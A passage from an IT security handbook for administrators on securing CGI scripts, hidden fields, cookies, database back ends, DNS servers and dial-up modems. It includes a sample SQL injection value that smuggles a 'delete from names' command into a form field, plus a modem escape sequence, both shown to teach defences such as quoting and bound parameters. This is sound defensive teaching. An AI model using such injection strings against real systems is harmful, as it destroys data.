place undue reliance on the source IP address in the packets of connections you receive. Addresses may be forged, altered, or hijacked with proxy servers. 17. Include some form of load shedding or load limiting in your server to handle cases of excessive load. For example, you can have the script check the load and exit with a polite error message if the load is over 5. This will make it harder for an attacker to launch a denial-of-service attack against your server by repeatedly calling the same script. It will also protect your server from a failure mode if hundreds of users all hit the "reload" button on a slow-running script in an effort to make it run faster. 18. Put reasonable time-outs on the clock time used by your script while it is running. Your program may become blocked for any number of reasons; for example, a read request from a remote server may hang or the user's web browser may not accept information that you send to it. An easy technique to solve both of these problems is to put hard limits on the amount of real time that your CGI script can use. Once it uses more than its allotted amount of real time, it should clean up and exit. Most modern systems support some call to set such a limit. 19. Put reasonable limits on the CPU time used by your CGI script while it is running. A bug in your CGI script may put it in an infinite loop. To protect your users and your server against this possibility, you should place a hard limit on the total amount of CPU time that the CGI script can consume. 20. Do not require the user to send a reusable password in plaintext over the network connection to authenticate herself. If you use usernames and passwords, use a cryptographically enabled web server so that the password is not sent in plaintext. Alternatively, use client-side certificates to provide authentication. If your users access an Internet Information Server web server through Internet Explorer, then you can use the NT challenge/response (NTLM), a Microsoft proprietary modification to the HTTP protocol. Finally, you can use HTTP Digest Authentication, which has an MD5 MAC to verify a shared password between the web server and the web browser. Apache 2.0 and above support Digest-based authentication with the mod_ auth_digest module; support in many browsers is increasing. The primary disadvantage of digest authentication is that it requires the web server to maintain an essentially unencrypted copy of each user's password. For details on digest authentication, search for the AuthDigestFile directive in the Apache documentation, or look at http://www.apache.org/docs-2.0/mod/mod_auth_digest.html. 21. Read through your code. Think of how you might attack it yourself. What happens if the program gets unexpected input? What happens if you are able to delay the program between two system calls? Remember, most security flaws are actually programming faults. In a way, this is good news for programmers. When you make your program more secure, you'll simultaneously be making it more reliable. PART Securely Using Fields, Hidden Fields, and Cookies FIVE One of the reasons that it can be difficult to develop secure web applications has to do with the very architecture of web applications. When you develop an application, you generally write a body of code that runs locally on the web server and a much smaller body of code that is downloaded and run remotely on the user's web browser. You 280 IT SECURITY FOR TECHNICAL ADMINISTRATORS might spend a lot of time making sure that these two code bases work properly together. For example, it's very important to make sure that the field names downloaded in web forms exactly match the field names that server- side scripts are expecting. And you will probably spend time making sure that the HTML forms, JavaScript, and other codes that are downloaded to the browser work properly on a wide range of different browser programs. Even in the best of times, it can be difficult to get software on the web browser and the web server to properly synchronize and interoperate. What makes this whole process difficult from the security perspective is that attackers, by definition, don't play by the rules. Sure, they can run your HTML forms and JavaScript in well-behaved browsers, but they can also pick apart the code, analyze it, and send completely made-up responses back to your web server. These sorts of attacks are difficult to detect because they are very hard for normal web developers to test against--after all, most web developers don't have a stable of CGI-script attack tools. There is nothing inherently wrong with storing this information on the web browser instead of the web server; indeed, storing this information on the browser eliminates the need for a backend database, user tracking, and a lot of other technology. But if you store information on the user's web browser, you must validate this information when it is passed back to the web server to make sure that it has not been modified. Many programmers do not realize the need to validate information returned from the web browser to the server. For example, in December 1999 engineers at Internet Security Systems (ISS) discovered that many e-commerce scripts from different vendors all shared a common vulnerability: they maintained the shopping cart, complete with the price for each item, on the user's web browser without using any form of validation.235 When an invoice was prepared and a credit card charged, they blindly trusted the prices provided by the shopping carts. Thus, any attacker who wanted to give himself a discount could simply go shopping, save the server's HTML onto his hard drive, edit the prices, and then click on the "Buy" button. In a Spring 2001 study,236 four MIT graduate students discovered that many e-commerce sites did not properly validate the information in cookies. As a result, they were able to make subtle modifications in the cookies at e-commerce sites and gain access to unauthorized information. Using Fields Securely When checking arguments in your program, pay special attention to the following: · Filter the contents of every field, selecting the characters that are appropriate for each response. For example, if a field is supposed to be a credit card number, select out the characters 0­9 and leave all other characters behind. This will also allow people to enter their credit card numbers with spaces or dashes. · After you filter, check the length of every argument. If the length is incorrect, do not proceed, but instead generate an error. · If you use a selection list, make certain that the value provided by the user was one of the legal values. Attackers can provide any value that they wish: they are not constrained by the allowable values in the selection list. · Even if your forms use JavaScript to validate the contents of a form before it is submitted, be sure that you revalidate the contents on the server. An attacker can easily turn off JavaScript or bypass it entirely. Hidden Fields and Compound URLs A hidden field is a field that the web server sends to the web browser that is not displayed on the user's web page. Instead, the field merely sits in the browser's memory. When the form on the page is sent back to the server, the field and its contents are sent back. 235ISS reported the security problem to the 11 vendors in December 1999, then released the information about the vulnerability to the press in February 2000. For further information, see http://www.cnn.com/2000/TECH/ computing/02/04/shop.glitch.idg/. 236See "Dos and Don'ts of Client Authentication on the Web," USENIX and MIT Technical Report 818, by Kevin Fu, Emil Sit, Kendra Smith, and Nick Feamster. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 281 Some web developers use hidden fields to store information that is used for session tracking on e-commerce systems. For example, instead of using HTTP Basic Authentication, developers sometimes embed the username and password provided by the user as hidden fields in all future form entries: Hidden fields can also be used to implement a shopping cart: Instead of embedding this information in hidden fields, it can be placed directly in the URL. These URLs will then be interpreted as if they were forms that were posted using the HTTP GET protocol. For example, this URL embeds a username and password: http://www.vineyard.net/cgi-bin/password_tester?username=simsong&password=myauth11 It's quite easy to use hidden fields. Little or no information needs to be stored on the server. And unlike cookies, which are limited to 4096 bytes, hidden fields can be practically any length whatsoever. There are problems with using hidden fields in this way, however: · If the user presses the "Back" button, items may be removed from the shopping cart. Sometimes this is the desired behavior, but usually it is not. · HTML pages used by one person might be viewed by other people, possibly because the computer is shared. In this circumstance, the first user's username, password, or shopping cart contents might be disclosed. · If you use URLs to embed information, the complete URL--including the embedded information--will be stored in the web server's log files. The full URL may also be passed by the user's browser in the referrer [sic] header when the user accesses another web server. This may compromise the user's privacy and/or security. · In the vast majority of cases, the contents of the hidden field received by the web server are identical to what was originally provided. But there is no guarantee. An attacker can save your HTML to a file, analyze the form, and issue his own HTTP GET or POST command with whatever contents he desires. An attacker can also submit the same web page over and over, with slight modifications, probing for vulnerabilities. There is no way to stop this sort of behavior, so you must defend against it. · If the HTTP connection is not SSL-encrypted, an attacker who can intercept the data may gain access to authentication credentials or other sensitive information. Using Cookies One attractive alternative to using hidden fields or URLs is to store information such as usernames, passwords, shopping cart contents, and so on, in HTTP cookies. Users can modify their cookies, so cookies used for user tracking, shopping carts, and other types of e-commerce PART applications have all of the same problems described for hidden fields or compound URLs. But cookies also have problems all their own, including: FIVE · Old cookies may continue to be used, even after they have "expired." · Users may make long-term copies of cookies that are supposed to remain ephemeral and not ever be copied onto a hard drive. · Some users are suspicious of cookies and simply turn off the feature. 282 IT SECURITY FOR TECHNICAL ADMINISTRATORS Using Cryptography to Strengthen Hidden Fields, Compound URLs, and Cookies Many of the problems discussed above can be solved by using cryptography to protect the information in hidden fields, compound URLs, and cookies. Cryptography can: · Prevent users from understanding the information stored on their computer. · Allow web server applications to detect unauthorized or accidental changes to this information. Here are examples from the previous sections, recoded to use cryptography. Username and password authentication: A secure shopping cart: A compound URL: http://www.vineyard.net/cgi-bin/password_ tester?p6e6J6FwQOk0tqLFTFYq5EXR03GQ1wYWG0ZsVnk09yv7ItIHG17ymls4UM%2F1bwHygRhp7 ECawzUm%0AKl3Q%2BKRYhlmGILFtbde8%0A: In each of these cases, the individual human-readable variables have been replaced with a cryptographic block of information. This block is created with the following procedure: 1. Take the individual variables that need to be preserved and encode them as a string. This is called marshalling. 2. Prepend a 4-byte timestamp to these variables. The timestamp protects against replay attacks. 3. Compress the data. This saves space. 4. Prepend the length of the string to the data. This is required for decryption with block cipher. 5. Encrypt the string using a symmetric encryption function with a secret key. 6. Calculate an HMAC function of this encrypted string and prepend it to the encrypted string. The HMAC protects all encrypted, compressed, and marshaled data. 7. Encode the resulting string with Base64, then escape the non-URL characters and return the resulting string. 8. Use this escaped, Base64-encoded, encrypted, compressed string for hidden fields, compound URLs, and cookies. To decode and validate this encrypted string, simply follow these steps in reverse: 1. Isolate the escaped, Base64-encoded, encrypted, compressed string from the hidden field, compound URL, or cookie. 2. Unescape the Base64 representation. 3. Remove the Base64 coding. 4. Verify the HMAC. If it doesn't verify, then the string has been tampered with. Report an error and return. 5. Unencrypt the data. 6. Recover the length and use this to truncate the unencrypted data to the original length. This step is needed because block encryption functions will append null bytes to data to pad it out to an even block. 7. Decompress the compressed data. 8. Recover the timestamp from the beginning of the uncompressed data. If the timestamp is too old, disregard. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 283 9. Return the remaining data to the caller, which will decode all of the original variables from the string. This looks tremendously complicated and computationally intensive, but in fact, it is quite easy to code up and can run very quickly, as MD5 and symmetric encryption functions are quite fast. There are also ready-made libraries for doing this, such as CGI::EncryptForm for perl. Connecting to Databases It is common for a CGI program or script to connect to databases that are external to the web server. External databases can be used for many purposes, such as storing user preferences, implementing shopping carts, and even order processing. When the script runs, it opens a connection to the database, issues a query, gets the result, and then uses the result to formulate a response to the user. On some systems, a new database connection is created each time a new script is run. Other systems maintain a small number of persistent connections that are cached. Database-backed web sites give a tremendous amount of power and flexibility to the web designer. Unfortunately, this approach can also reduce the overall security of the system: many security breaches have happened because an attacker was able to execute arbitrary SQL commands on the database server and view the results. If you deploy a database server to supplement your web site, it is important to be sure that the server is deployed and used securely. Protect Account Information Before the database server provides results to the script running on the web server, the server needs to authenticate the script to make sure it is authorized to access the information. Most databases use a simple username/password for account authentication, which means the script needs to have a valid username/password and present this information to the database server each time a request is issued. Among many developers it is common practice to simply code the username and password into the scripts that require access to the database server. Unfortunately, this practice has several problems: · If an attacker is able to view the script, the attacker will learn the username and password. · If many scripts require access to the username and password, then it must be stored in several scripts. · Changing the username and password requires modifying the script. When the script is modified, other changes may be made inadvertently. Instead of storing the database username and password in the script, a better approach is to store this information in a file on the web server. This approach isolates the authentication information from the script that is performing the database request, which improves both maintainability and security. The server script then opens this file and reads the username and password prior to issuing a database request. Remember that if the database server is not on the same host as the web server, those usernames and passwords will be transmitted over the network between the hosts. Be sure to use a database that allows for encrypted remote connections or another form of authentication that does not transmit cleartext passwords. PART Use Filtering and Quoting to Screen Out Raw SQL FIVE As we mentioned earlier, it is extremely important to filter all data from the user to make sure that it contains only allowable characters. When working with SQL servers, it is further important to properly quote data provided by the user before sending the data to the server. These procedures are used to prevent users from constructing their own SQL commands and sending that data to the SQL server. 284 IT SECURITY FOR TECHNICAL ADMINISTRATORS For example, if you have a web form that asks a person for his name and then stores this information into a database, it might be tempting to simply take the person's name from a field, put that field into a variable called $name, and then construct a SQL command using this variable. Consider this perl snippet: $name = param('name'); sql_send("insert into names (name) value ('$name');"); Unfortunately, this is not safe: an attacker who has knowledge of your application can provide a specially crafted name that results in arbitrary SQL commands being executed. Consider this name: John Smith')"; delete from names; When this name is used to build the SQL command, the resultant string will actually be interpreted as three commands--one that makes an insertion into the database, a second that deletes all of the data in the names table, and a third that contains a syntax error: insert into names (name) value (`John Smith')"; delete from names; '); Given this text, most SQL servers will insert a record into the names table, delete all of the data, and then report a SQL error. The way to protect scripts from these kinds of attacks is to make sure that you first carefully filter incoming data, and that you next quote all of the remaining data properly before sending it to the SQL server. Quoting is best done with a separate function that is always called whenever any string is sent to the SQL server. If you are using the Perl language and the DBI package, most of the database drivers provide a quote method on the database handle that performs such quoting. You use it like this: # $dbh is a DBI object that represents a handle to an open database connection $qname = $dbh->quote(param(`name')); $dbh->do("insert into name (name) value($qname)"); Another approach is to precompile your SQL queries using variable binding. Variable binding allows you to precompile SQL queries with placeholders instead of actual variables. To return to our original example, you might compile the query using a hypothetical SQL interface that uses the @ sign as a placeholder for variables: $func = sql_compile("insert into name (name) value (@)"); You might then execute this query with some other hypothetical function: $name = param('name'); sql_bind($func,1,$name); # bind the variable name to the first variable sql_exec($func); # execute the bound function Using the DBI package, you often write it like this: # Insertion example $name = param('name'); $dbh->do("insert into name (name) value (?)", undef, $name); # Selection example $sth = $dbh->prepare("select * from name where id = ?"); $sth->execute($name); Different systems will have different syntaxes and APIs for compiling, binding, and executing SQL queries. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 285 Content Updating How will your users update the web server's content? In the early days of the World Wide Web, most content was created live on web servers by programmers and developers using text (or HTML) editors. These days most content is created on desktop PCs and Macs and then uploaded to the web server. This upload is fundamentally a file transfer operation, and thus subject to eavesdropping. As discussed above, you should require users to use a secure file transfer system, such as scp, Web-DAV over SSL, or insecure file transfer programs running over a virtual private network. In some cases, physical transfer by means of floppy disks or CD-ROMs may be preferable to any form of network transfer. Securing Database Servers If you use a database back-end, it is important that you protect the database server itself. If the database server runs on the same host as the web server, insure that it does not allow network access. If the database server runs on a separate host, consider these protections: · Configure your firewall or network topology so that it is impossible for people out-side your organization to access your database server. For example, you may wish to set up your web server with two Ethernet adapters-- one that connects to the Internet, and one that connects to a small firewall appliance that, in turn, connects to your database server. The firewall should be set up so that only database queries can pass between the web server and the database server. · Make sure logins on the database server are limited. The individuals with login capabilities should be the system administrator and the database administrator. · Make sure that the database server is backed up, physically protected, and maintained in the same way as your other secure servers. Protection of the database is also necessary. When defining database users and access privileges, follow the principle of least privilege. If a CGI script only needs read access to a single table in a database, define a user with privileges restricted to only allow the necessary access and have the script connect with that user. Some database software allows you to define very fine-grained permissions for users ­ in some cases, you can grant or restrict access to individual columns or rows in a given table, or provide different access to users based on where or how they connect. Take advantage of these protections. Securing DNS Name Servers Organizations rely on their DNS servers to provide accurate hostname-to-ip address (and ip address-to-hostname and hostname-to-hostname) translations for other systems on the Internet. Because every domain on the Internet must have an authoritative name server, and because the addresses of these name servers must be public to be useful, DNS servers are a natural point of attack for an intruder. Because many applications use hostnames as the basis for access control lists, an attacker who can gain control of your DNS nameserver or corrupt its contents often leverage that to break into your systems. Besides individual hostname resolutions, DNS also provides a system for downloading a copy of the entire database PART from a nameserver. This process is called a zone transfer, and this is the process that secondary servers use to obtain a copy of the primary server's database. FIVE DNS communicates over both UDP and TCP. Because UDP is a quick, packet-based protocol that allows for limited data transfer, it is typically used for the actual process of hostname resolution. TCP, meanwhile, is most commonly used for transactions that require large, reliable, and sustained data transfer--that is, zone transfers. However, individual queries can be made over TCP as well. 286 IT SECURITY FOR TECHNICAL ADMINISTRATORS DNS zone transfers Zone transfers can be a security risk, as they potentially give outsiders a complete list of all of an organization's computers connected to the internal network. Many sites choose to allow UDP DNS packets through their firewalls and routers, but explicitly block DNS zone transfers originating at external sites. This design is a compromise between safety and usability: it allows outsiders to determine the IP addresses of each internal computer, but only if the computer's name is already known. You can block zone transfers with a router that can screen packets by blocking incoming TCP connections on port 53.237 Modern versions of the BIND nameserver implement an allow-transfers directive that allows you to specify the IP addresses of hosts that are allowed to perform zone transfers. This option is useful if you wish to allow zone transfers to a secondary nameserver that is not within your organization, but you don't want to allow zone transfers to anyone else. DNS nameserver attacks There are three fundamental ways that an attacker can cause a nameserver to serve incorrect information: Loading erroneous information Incorrect information can be fraudulently loaded into your nameserver's cache over the network, as a false reply to a query. This is often referred to as cache poisoning. If your nameserver has contact with the outside network, there is a possibility that attackers can exploit a programming bug or a configuration error to load your nameserver with erroneous information. The best way to protect your nameserver from these kinds of attacks is to isolate it from the outside network, so that no contact is made. If you have a firewall, you can achieve this isolation by running two nameservers: one in front of the firewall, and one behind it. The nameserver in front of the firewall contains only the names and IP addresses of your gateway computer; the nameserver behind the firewall contains the names and IP addresses of all of your internal hosts. If you couple these nameservers with static routing tables, damaging information will not likely find its way into your nameservers. (Of course, depending on how you have built your firewall and what you allow your users to do on the network, this may not be a workable solution!) Changing the configuration files An attacker can change the nameserver's configuration files on the computer where your nameserver resides. To change your configuration files, an attacker must have access to the filesystem of the computer on which the nameserver is running and be able to modify the files. After the files are modified, the nameserver must be restarted. As the nameserver must typically be started as the superuser, an attacker would need to have superuser access on the server machine to carry out this attack. Unfortunately, by having control of your nameserver, a skillful attacker could use that control as a stepping stone to control of your entire network. Furthermore, if the attacker does not have superuser access but can modify the nameserver files, then he can simply wait until the nameserver is restarted by somebody else, or until the system crashes and every program is restarted. Using dynamic DNS Modern DNS servers have facilities for dynamically updating DNS tables. This feature is very useful when IP addresses are dynamically assigned or shared among large numbers of people. Dynamic DNS allows a running DNS server to have its DNS tables updated without manually uploading a domain text file and asking the server to restart. However, an attacker can use the DNS dynamic update facility to provide your DNS server with a fraudulent update. To be secure, dynamic DNS updates must be properly authenticated -- otherwise, an attacker could attack your system by simply changing the mapping between your domain names and IP addresses. Most dynamic DNS servers 237In rare cases, this may also block DNS queries, which are also permitted to use TCP. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 287 make provisions for authentication by IP address (only certain IP addresses are allowed to provide updates), through the use of a shared key, or through the use of updates that are signed with a public key algorithm. In general, combining IP source address with one of the two cryptographic techniques provides for the highest level of security. If you enable dynamic DNS and it is not correctly implemented, an attacker may use it to update your server without your permission. Many domain name servers suffer a constant stream of fraudulent dynamic DNS update attacks. DNSSEC DNSSEC (RFC 2535 and 3130) is an extension to DNS that provides for the creation of a DNS-based Public Key Infrastructure (PKI) and the use of this infrastructure in the signing of DNS responses. DNSSEC is an interesting protocol. Proponents have argued convincingly that the use of DNSSEC provides an easy way to bootstrap a global PKI that is not dependent upon certificates sold at high prices by centralized certificate authorities. Unfortunately, because of its populist nature and the fact that nobody really makes money when DNS-SEC servers are deployed, there has been very little move to deploy DNSSEC on a widespread scale. You can minimize the possibility of an attacker's modifying or subverting your nameserver by following these recommendations: · Run your nameserver on a special computer that does not have user accounts. · If you must run the nameserver on a computer that is used by ordinary users, make sure that the nameserver's files and directories are protected from other users. If your nameserver can be configured to run as a nonprivileged user (as modern versions of BIND can), you should take advantage of this option and keep the nameserver's files accessible only to that user. · If your nameserver can be configured to run in a chroot jail area of the filesystem (as modern versions of BIND can), you can use this option to limit its access to other files on your host. · Configure your nameserver to ignore requests from bogus IP ranges (such as 10.0.0.0/8 if your subnet doesn't use these addresses). In BIND, the blackhole directive in named.conf can be used to do this. · Configure your nameserver not to perform recursive DNS queries for outsiders. In a recursive query, if your DNS server can't find the information for the client, it issues its own queries to try to resolve it. When recursive queries are not allowed, it is up to the client to do the followup work. Recursive queries consume nameserver resources, and should not be performed for outsiders. In BIND, the allow-recursion directive controls which client hosts may request a recursive query. · If you know of a specific site that is attempting to attack your nameserver, you can use BIND's bogusns directive to prevent the program from sending nameserver queries to that host, or add the site to your firewall. · If you use dynamic DNS updating facilities, require that updates be appropriately encrypted or cryptographically signed. Do not rely on IP addresses for appropriate authentication. PART FIVE 288 IT SECURITY FOR TECHNICAL ADMINISTRATORS CHAPTER 7. NETWORK SECURITY At a Glance Few computers are standalone workstations; most are connected to other computers via modems, networks, or wireless communications. This chapter discusses security issues for administrators configuring computers to participate in networks. First, it examines how the computer connects to the network, with special attention to modems, routers, and wireless access. Then it focuses on network security issues for networks using TCP/IP, the predominant networking protocol on both local area networks and the Internet. Modems In this age of the Internet, there are still many reasons to be concerned about with the security of modems and dialup services. Because dialup services are easy to set up and cheap to maintain, there are many that are still in operation -- some of which have been in operation for a decade or more. Likewise, even with the wide availability of local area networks and high-speed connections, there are many reasons that you might wish to set up your own modem-based network connections. If people in your organization want to use the computer from their homes after hours or on weekends, a modem will allow them to do so. Administrators can do some remote maintenance and administration when they are "on call." If some people in your organization travel infrequently, or if they travel to rural areas, they might want to use a modem to access the computer when they're out of town, particularly if nationwide Internet service is not available or secure. Despite these benefits, modems come with many risks. Because people routinely use modems to transmit their usernames and passwords, you should ensure that your modems and terminal servers are properly installed, behaving properly, and doing exactly what you think they are doing--and nothing else. Furthermore, because dialup services can be set up with a simple analog phone line or even a cell phone, they can be enabled by an individual without the knowledge or the authorization of an organization's management. Modems are a remote access technology born of the 1960s, first deployed in the 1970s, and popularized in the 1980s and 1990s. Nevertheless, modems are still very much a part of the computing landscape today. Attackers know that they can break into many otherwise defended networks by finding modems that have not been properly secured. For this reason, security professionals must be familiar with modem security issues. Modems and Security Modems raise a number of security concerns because they create links between your computer and the outside world. Modems can be used by individuals inside your organization to remove confidential information. Modems can be used by people outside your organization to gain unauthorized access to your computer. If your modems can be reprogrammed or otherwise subverted, they can be used to trick your users into revealing their passwords. And, finally, an attacker can eavesdrop on a modem communication. Despite the rise of the Internet, modems remain a popular tool for breaking into large corporate networks. The reason is simple: while corporations closely monitor their network connections, modems are largely unguarded and unaudited. To maximize security, modems should be provided by the organization and administered in a secure fashion. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 289 The first step is to protect the modems themselves. Be sure they are located in a physically secure location, so that no unauthorized individual can access them. The purpose of this protection is to prevent the modems from being altered or rewired. Some modems can have altered microcode or passwords loaded into them by someone with appropriate access, and you want to prevent such occurrences. You might make a note of the configuration switches (if any) on the modem, and periodically check them to be certain they remain unchanged. Many modems sold these days allow remote configuration and testing. This capability makes changes simpler for personnel who manage several remote locations. It also makes abusing your modems simpler for an attacker. Therefore, be certain that such features, if present in your modems, are disabled. The next most important aspect of protecting your modems is to protect their telephone numbers. Treat the telephone numbers for your modems the same way you treat your passwords: don't publicize them to anyone other than those who have a need to know. Making the telephone numbers for your modems widely known increases the chances that somebody might try to use them to break into your system. If your telephone system permits, change your modem numbers yearly, and request numbers that don't share the same prefix as your voice phones. Unfortunately, you cannot keep the telephone numbers of your modems absolutely secret. After all, people do need to call them. And even if you were extremely careful with the numbers, an attacker could always discover the modem numbers by dialing every telephone number in your exchange. For this reason, simple secrecy isn't a solution; your modems need more stringent protection. Banners A banner is a message that is displayed by a modem (or the computer to which the modem is connected) when it is called. Some banners are displayed by the answering system before the caller types anything; other banners are displayed only after a person successfully authenticates. Banners improve the usability of a system by letting the callers know that they have reached the correct system. They can also include any necessary legal disclosures or notices. Unfortunately, banners can also be used by attackers: an attacker who scans a telephone exchange or a city can use banners to determine which organization's modems they have found. Avoid including the name of your organization, phone numbers or other contact information, or any information about your computer's operating system in the banner. You should also avoid any word that expresses "welcome", as this may be interpreted as an invitation to unauthorized users. Here are some recommendations for what to put into your banner: · State that unauthorized use of the system is prohibited and may be prosecuted. (Do not say that unauthorized use will be prosecuted. If some unauthorized users are prosecuted when others are not, the users who are prosecuted may be able to claim selective enforcement of this policy.) · State that all users of the system may be monitored. · Tell the user that he is agreeing to be monitored as a condition of using the computer system. · In some cases, it is acceptable to display no welcome banner at all. PART Security Schemes FIVE With today's telephone systems, if you connect your computer's modem to an outside telephone line, then anybody in the world can call it. 290 IT SECURITY FOR TECHNICAL ADMINISTRATORS Although usernames and passwords provide a degree of security, they are not fool-proof. Users often pick bad passwords, and even good passwords can occasionally be guessed or discovered by other means. For this reason, a variety of special kinds of modems and modem use schemes have been developed that further protect computers from unauthorized access. Password modems These modems require the caller to enter a password before the modem connects the caller to the computer. As with regular system passwords, the security provided by these modems can be defeated by repeated password guessing or by having an authorized person release his password to somebody who is not authorized. Usually, these modems can only store one to ten passwords. The password stored in the modem should not be the same as the password of any user. Callback setups A callback scheme is one in which an outsider calls your machine, connects to the modem, and provides some form of identification. The system then severs the connection and calls the outsider back at a predetermined phone number. Call-back enhances security because the system will dial only preauthorized numbers, so an attacker cannot get the system to initiate a connection to his or her modem. Most callback modems can only store a few numbers to call back. To operate properly, callback systems must completely disconnect the incoming call before placing the outgoing call. This can be surprisingly difficult on many phone lines, so it's better to use a different set of modems for the outgoing calls than are used to receive the incoming calls. It is possible to subvert a callback system that uses two modems. If the attacker has subverted a phone company switch, he can install call-forwarding on the phone number that the callback modem is programmed to dial, and forward those calls back to his modem. Callback schemes can enhance your system's overall security, but you should not depend on them as your primary means of protection Encrypting modems These modems, which must be used in pairs, encrypt all information transmitted and received over the telephone lines. Encrypting modems offer an extremely high degree of security not only against individuals attempting to gain unauthorized access, but also against wiretapping. Some encrypting modems contain preassigned cryptographic "keys" that work only in pairs. Other modems contain keys that can be changed on a routine basis, to further enhance security. Many of the benefits afforded by encrypting modems can be had for less money by using cryptographic protocols over standard modems, such as SSH over a PPP connection. Caller-ID In many areas, you can purchase an additional telephone service called Caller-ID (CNID). As its name implies, Caller-ID identifies the phone number of each incoming telephone call. The phone number is usually displayed on a small box next to the telephone when the phone starts ringing. Many modems support Caller-ID directly. When these modems are properly programmed, they will provide Caller-ID information to the host computer when the information is received over the telephone lines. There are many ways that you can integrate Caller-ID with your remote access services: · Some remote access systems can be programmed to accept the Caller-ID information directly and log the information for each incoming call along with the time and the username that was provided. The vast majority of remote access systems that support telephone lines delivered over ISDN Basic Rate, ISDN PRI, and T1 Flex-Path circuits include support for logging Caller-ID information in RADIUS accounting log files.238 238RADIUS, the Remote Authentication Dial In User Service, is a protocol designed to allow terminal servers to authenticate dial-up users against a remote database. It is described in RFC 2138. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 291 · Caller-ID can be very useful for tracking down perpetrators after a break-in. Unlike a username and password, which can be stolen and used by an unauthorized individual, Caller-ID information almost always points back to the actual source of an attack. · If your remote access system does not handle Caller-ID, you can set up a second modem in parallel with the first on the same line. Program your computer to answer the first modem on the third or fourth ring. Use a third-party Caller-ID logging program to capture the Caller-ID information from the second modem. You will then need to manually combine the two logs. · ISDN and some other telephone systems offer yet another service called Restricted Calling Groups, which allows you to specify a list of phone numbers that are allowed to call your telephone number. All other callers are blocked. Advanced telephone services such as these are only as secure as the underlying telephone network infrastructure: many corporate telephone systems allow the corporation to determine what Caller-ID information is displayed on the telephone instrument of the person being called -- even for calls that terminate on other parts of the public switched telephone network. Attackers who have control of a corporate telephone system could program it to display whatever phone number they desire, potentially bypassing any security system that depends solely on Caller-ID or Restricted Calling Groups. Physical intervention schemes When modems are connected to hardware to allow off-site technicians to remotely maintain or troubleshoot it, you certainly want to prevent unauthorized users from connecting to these modems and reconfiguring your equipment. One simple and effective approach is to leave the modems unplugged from the phone line, and require off-site technicians to call your operator before performing maintenance (or, better yet, the reverse, to make social engineering attacks less feasible.) The operator connects the phone line for the technician's work (and notes this in a log book), and disconnects it thereafter. One-Way Phone Lines Many sites set up their modems and telephone lines so that they can both initiate and receive calls. This may seem like an economical way to make the most use of your modems and phone lines. However, this approach introduces significant security risks. Outgoing modems can be used to make free phone calls at your expense. When both inbound and outbound calls are allowed on the same modems, attackers can subvert callback systems or tie up your outbound lines by using them for inbound connections. Your system will be more secure if you use separate modems for inbound and outbound traffic. In most environments the cost of the extra phone lines is minimal compared to the additional security and functionality provided by line separation. You may further wish to routinely monitor the configuration of your telephone lines to check for the following conditions: · Check to make sure that telephone lines that are not used to call long-distance telephone numbers cannot, in fact, place long-distance telephone calls. Don't subscribe to long-distance service. PART · Check to make sure that telephone lines used only for inbound calls cannot place outbound calls. · Check to make sure that telephone lines used only for outgoing calls cannot receive calls. Call forwarding is a FIVE typical way to insure this. 292 IT SECURITY FOR TECHNICAL ADMINISTRATORS Protection of Modems and Lines Although physical protection is often overlooked, protecting the physical access to your telephone line is as important as securing the computer to which the telephone line and its modem are connected. Be sure to follow these guidelines: Protect physical access to your telephone line Be sure that your telephone line is physically secure. Lock all junction boxes. Place the telephone line itself in an electrical conduit, pulled through walls or at least located in locked areas. An intruder who gains physical access to your telephone line can attach his or her own modem to the line and intercept your telephone calls before they reach your computer. By spoofing your users, the intruder may learn their login names and passwords. Instead of intercepting your telephone calls, an intruder might simply monitor them, making a transcript of all of the information sent in either direction. In this way, the intruder might learn passwords not only to your system, but also to all of the systems to which your users connect. Make sure incoming telephone lines do not allow call forwarding If your telephone can be programmed for call forwarding, an intruder can effectively transfer all incoming telephone calls to a number of his choosing. If there is a computer at the new number that has been programmed to act like your system, your users might be fooled into typing their usernames and passwords. Have your telephone company disable third-party billing Without third-party billing, people can't bill their calls to your modem line. Consider using a leased line If all your modem usage is to a single outside location, consider getting a leased line. A leased line is a dedicated circuit between two points provided by the phone company. It acts like a dedicated cable and cannot be used to place or receive calls. As such, it allows you to keep your connection with the remote site, but it does not allow someone to dial up your modem and attempt a break-in. Leased lines are more expensive than regular lines in most places, but the security may outweigh the cost. Leased lines offer another advantage: you can usually transfer data much faster over leased lines than over standard telephone lines. Testing Modems After a modem is connected, you should thoroughly test its ability to make and receive telephone calls. First, make sure that the modem behaves properly under normal operating circumstances. Next, make sure that when something unexpected happens, the computer behaves in a reasonable and responsible way. For example, if a telephone connection is lost, your computer should kill the associated processes and log the user out, rather than letting the next person who dials in access the previous command interpreter. Most of this testing will ensure that your modem's control signals are being properly sent to the computer (so that your computer knows when a call is in progress), as well as ensuring that your computer behaves properly with this information. Originate testing If you have configured your modem to place telephone calls, you need to verify that it always does the right thing when calls are placed as well as when they are disconnected. To test your modem, you must call another computer that you know behaves properly. (Do not place a call to the same computer that you are trying to call out from; if there are problems, you may not be able to tell where the problem lies.) Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 293 Test as follows: 1. Try calling the remote computer with a terminal emulation program. Each time the computer answers, you should get a login prompt. You should be able to log in and use the remote computer as if you were connected directly. 2. Hang up on the remote computer by pulling the telephone line out of the originating modem. Your terminal program should realize that the connection has been lost. 3. Call the remote computer again and this time hang up by turning off your modem. Again, your program should realize that something is wrong. 4. Call the remote computer again. This time, leave the telephone connection intact and exit your program. Your modem should automatically hang up on the remote computer. 5. Call the remote computer one last time. This time, do a software disconnect by killing the terminal process on your local computer (either from another terminal or with the Task Manager on Windows systems.) Once again, your modem should automatically hang up on the remote computer. Other things to check for dialing out include: · Make sure there is no way to enter your modem's programming mode by sending an escape sequence. An escape sequence is a sequence of characters that lets you reassert control over the modem and reprogram it. Most modems that use the "AT" command set (originally developed by the Hayes modem company), for example, can be forced into programming mode by allowing a three-second pause; sending three plus signs (+), the default escape character, in quick succession; and waiting another three seconds. If your modem prints "OK," then your modem's escape sequence is still active. Many Unix modem control programs disable the modem's escape sequence, but some do not. On some modems, for example, sending the sequence "+++\rATH0;ATDT611" causes the modem to hang up the phone and dial "611," the universal number for telephone repair. (While some modems require a 3-second pause between the "+++" and the "\r", other modems do not, because the 3-second pause 